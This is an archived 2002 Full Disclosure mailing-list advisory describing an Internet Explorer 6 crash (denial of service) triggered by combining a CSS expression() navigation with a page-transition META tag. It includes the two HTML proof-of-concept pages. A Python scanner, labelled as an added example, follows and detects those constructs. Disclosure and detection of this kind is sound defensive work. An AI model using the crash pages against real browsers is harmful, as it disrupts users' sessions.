Full Disclosure mailing list archives
crash IE using jscript and page transitions
From: full-disclosure () lists netsys com (Berend-Jan Wever)
Date: Fri, 12 Jul 2002 17:05:20 +0200
(on my site: http://spoor12.edup.tudelft.nl/SkyLined v4.2/?Advisories/Microsoft Internet Explorer/Page transition DoS)

The problem

Internet Explorer 6.0 can be made to throw an exception using specially crafted jscript commands and page transitions. Other versions are probably vulnerable too but this has not been tested. Problems arise when a page transition is activated by a new page when the old page has not been rendered yet. This situation can occur when javascript redirects the browser before the page is fully rendered.

An example

The following two pages, called 1.html and 2.html, crash IE with an Access violation in mshtml.dll when 1.html is loaded into IE.

1.html:
<HTML style="width:expression(navigate('2.html'));"></HTML>

2.html:
<HTML><HEAD><META http-equiv="Page-Enter" content="blendTrans()"></HEAD></HTML>

Impact

Seems to be just a minor bug resulting in a DoS.

Berend-Jan Wever aka SkyLined
http://spoor12.edup.tudelft.nl/
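A mail or web gateway can flag the two constructs the advisory combines: a CSS expression() and a page-transition META tag. The Python scanner below is an added example, not part of the original post; the class and function names and the sample strings are constructed for illustration, and it goes slightly beyond the post by also checking style blocks and the Page-Exit, Site-Enter and Site-Exit transition triggers.

```python
import re
from html.parser import HTMLParser

# Constructed samples: the two pages quoted in the advisory, a benign page,
# and a variant that hides the expression in a <style> block.
PAGE_1 = """<HTML style="width:expression(navigate('2.html'));"></HTML>"""
PAGE_2 = """<HTML><HEAD><META http-equiv="Page-Enter" content="blendTrans()"></HEAD></HTML>"""
BENIGN = ('<html><head><meta http-equiv="Content-Type" content="text/html">'
          '</head><body style="width:100%">hello</body></html>')
STYLE_BLOCK = "<style>div { width: expression (1) }</style>"

# IE evaluates expression(...) inside CSS as script; allow space before "(".
CSS_EXPRESSION = re.compile(r"expression\s*\(", re.I)
# http-equiv values that make IE play a transition filter on navigation.
TRANSITION_EQUIVS = {"page-enter", "page-exit", "site-enter", "site-exit"}


class TransitionScanner(HTMLParser):
    """Collects (tag, reason) findings for the constructs named above."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []
        self.in_style = False

    def handle_starttag(self, tag, attrs):
        # HTMLParser already lowercases tag and attribute names.
        a = {k: (v or "") for k, v in attrs}
        if CSS_EXPRESSION.search(a.get("style", "")):
            self.findings.append((tag, "css-expression"))
        if tag == "meta" and a.get("http-equiv", "").strip().lower() in TRANSITION_EQUIVS:
            self.findings.append((tag, "page-transition"))
        if tag == "style":
            self.in_style = True

    def handle_endtag(self, tag):
        if tag == "style":
            self.in_style = False

    def handle_data(self, data):
        if self.in_style and CSS_EXPRESSION.search(data):
            self.findings.append(("style", "css-expression"))


def scan(html_text):
    """Return the list of (tag, reason) findings for one HTML document."""
    scanner = TransitionScanner()
    scanner.feed(html_text)
    scanner.close()
    return scanner.findings
```

Neither construct is malicious on its own, so findings are best treated as a signal to correlate (for example, an expression() that navigates to a page carrying a transition tag) rather than as a block rule.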
Current thread:
- crash IE using jscript and page transitions Berend-Jan Wever (Jul 12)
- crash IE using jscript and page transitions Blue Boar (Jul 12)